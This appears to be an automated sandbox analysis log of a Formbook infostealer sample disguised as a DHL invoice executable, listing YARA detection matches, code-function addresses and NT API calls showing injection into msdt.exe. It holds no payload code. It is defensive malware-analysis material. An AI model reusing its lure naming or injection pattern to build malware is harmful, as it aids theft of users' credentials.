          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_004E28550_2_004E2855
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_00E2C5540_2_00E2C554
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_00E2E8AB0_2_00E2E8AB
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_00E2E8B80_2_00E2E8B8
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041DB583_2_0041DB58
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041E4E93_2_0041E4E9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00402D893_2_00402D89
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041E59C3_2_0041E59C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D5A33_2_0041D5A3
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041EDB13_2_0041EDB1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041DE453_2_0041DE45
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409E5C3_2_00409E5C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_009928553_2_00992855
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146F9003_2_0146F900
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014841203_2_01484120
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015210023_2_01521002
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153E8243_2_0153E824
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015328EC3_2_015328EC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B0903_2_0147B090
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A03_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015320A83_2_015320A8
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01532B283_2_01532B28
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152DBD23_2_0152DBD2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015203DA3_2_015203DA
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149EBB03_2_0149EBB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151FA2B3_2_0151FA2B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015322AE3_2_015322AE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01531D553_2_01531D55
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01532D073_2_01532D07
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01460D203_2_01460D20
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015325DD3_2_015325DD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E03_2_0147D5E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014925813_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152D4663_2_0152D466
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147841F3_2_0147841F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153DFCE3_2_0153DFCE
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01531FF13_2_01531FF1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152D6163_2_0152D616
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01486E303_2_01486E30
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01532EF73_2_01532EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B09011_2_0491B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A011_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D20A811_2_049D20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491841F11_2_0491841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C100211_2_049C1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493258111_2_04932581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D25DD11_2_049D25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491D5E011_2_0491D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490F90011_2_0490F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D2D0711_2_049D2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04900D2011_2_04900D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492412011_2_04924120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D1D5511_2_049D1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D22AE11_2_049D22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D2EF711_2_049D2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04926E3011_2_04926E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493EBB011_2_0493EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CDBD211_2_049CDBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D1FF111_2_049D1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D2B2811_2_049D2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071DB5811_2_0071DB58
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071E4E911_2_0071E4E9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D5A311_2_0071D5A3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071EDAD11_2_0071EDAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00702D9011_2_00702D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071E59C11_2_0071E59C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00702D8911_2_00702D89
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00709E6011_2_00709E60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00709E5C11_2_00709E5C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071DE4511_2_0071DE45
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00702FB011_2_00702FB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: String function: 0146B150 appears 45 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0490B150 appears 35 times
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A40A NtReadFile,3_2_0041A40A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041A53C NtAllocateVirtualMemory,3_2_0041A53C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_014A9910
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A99A0 NtCreateSection,LdrInitializeThunk,3_2_014A99A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9840 NtDelayExecution,LdrInitializeThunk,3_2_014A9840
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_014A9860
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_014A98F0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A50 NtCreateFile,LdrInitializeThunk,3_2_014A9A50
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_014A9A00
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A20 NtResumeThread,LdrInitializeThunk,3_2_014A9A20
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9540 NtReadFile,LdrInitializeThunk,3_2_014A9540
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A95D0 NtClose,LdrInitializeThunk,3_2_014A95D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9710 NtQueryInformationToken,LdrInitializeThunk,3_2_014A9710
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9780 NtMapViewOfSection,LdrInitializeThunk,3_2_014A9780
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_014A97A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_014A9660
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_014A96E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9950 NtQueueApcThread,3_2_014A9950
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A99D0 NtCreateProcessEx,3_2_014A99D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AB040 NtSuspendThread,3_2_014AB040
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9820 NtEnumerateKey,3_2_014A9820
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A98A0 NtWriteVirtualMemory,3_2_014A98A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9B00 NtSetValueKey,3_2_014A9B00
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AA3B0 NtGetContextThread,3_2_014AA3B0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A10 NtQuerySection,3_2_014A9A10
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9A80 NtOpenDirectoryObject,3_2_014A9A80
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9560 NtWriteFile,3_2_014A9560
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9520 NtWaitForSingleObject,3_2_014A9520
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AAD30 NtSetContextThread,3_2_014AAD30
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A95F0 NtQueryInformationFile,3_2_014A95F0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9760 NtOpenProcess,3_2_014A9760
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AA770 NtOpenThread,3_2_014AA770
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9770 NtSetInformationFile,3_2_014A9770
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014AA710 NtOpenProcessToken,3_2_014AA710
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9730 NtQueryVirtualMemory,3_2_014A9730
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9FE0 NtCreateMutant,3_2_014A9FE0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9650 NtQueryValueKey,3_2_014A9650
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9670 NtQueryInformationProcess,3_2_014A9670
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A9610 NtEnumerateValueKey,3_2_014A9610
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A96D0 NtCreateKey,3_2_014A96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949840 NtDelayExecution,LdrInitializeThunk,11_2_04949840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04949860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049499A0 NtCreateSection,LdrInitializeThunk,11_2_049499A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049495D0 NtClose,LdrInitializeThunk,11_2_049495D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04949910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949540 NtReadFile,LdrInitializeThunk,11_2_04949540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049496D0 NtCreateKey,LdrInitializeThunk,11_2_049496D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_049496E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949650 NtQueryValueKey,LdrInitializeThunk,11_2_04949650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A50 NtCreateFile,LdrInitializeThunk,11_2_04949A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04949660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949780 NtMapViewOfSection,LdrInitializeThunk,11_2_04949780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949FE0 NtCreateMutant,LdrInitializeThunk,11_2_04949FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949710 NtQueryInformationToken,LdrInitializeThunk,11_2_04949710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049498A0 NtWriteVirtualMemory,11_2_049498A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049498F0 NtReadVirtualMemory,11_2_049498F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949820 NtEnumerateKey,11_2_04949820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494B040 NtSuspendThread,11_2_0494B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049499D0 NtCreateProcessEx,11_2_049499D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049495F0 NtQueryInformationFile,11_2_049495F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494AD30 NtSetContextThread,11_2_0494AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949520 NtWaitForSingleObject,11_2_04949520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949950 NtQueueApcThread,11_2_04949950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949560 NtWriteFile,11_2_04949560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A80 NtOpenDirectoryObject,11_2_04949A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949610 NtEnumerateValueKey,11_2_04949610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A10 NtQuerySection,11_2_04949A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A00 NtProtectVirtualMemory,11_2_04949A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949A20 NtResumeThread,11_2_04949A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04949670 NtQueryInformationProcess,11_2_04949670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494A3B0 NtGetContextThread,11_2_0494A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049497A0 NtUnmapViewOfSection,11_2_049497A0
